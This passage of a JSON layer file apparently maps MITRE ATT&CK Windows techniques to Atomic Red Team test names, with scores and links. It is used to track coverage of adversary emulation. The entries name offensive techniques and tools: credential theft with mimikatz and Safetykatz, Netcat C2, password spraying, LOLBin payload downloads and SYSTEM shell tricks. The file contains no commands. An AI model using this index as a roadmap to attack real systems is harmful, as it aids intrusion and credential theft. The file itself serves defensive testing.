Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":17,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":56,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":3,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome (Developer Mode)\n- Chrome (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":74,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View 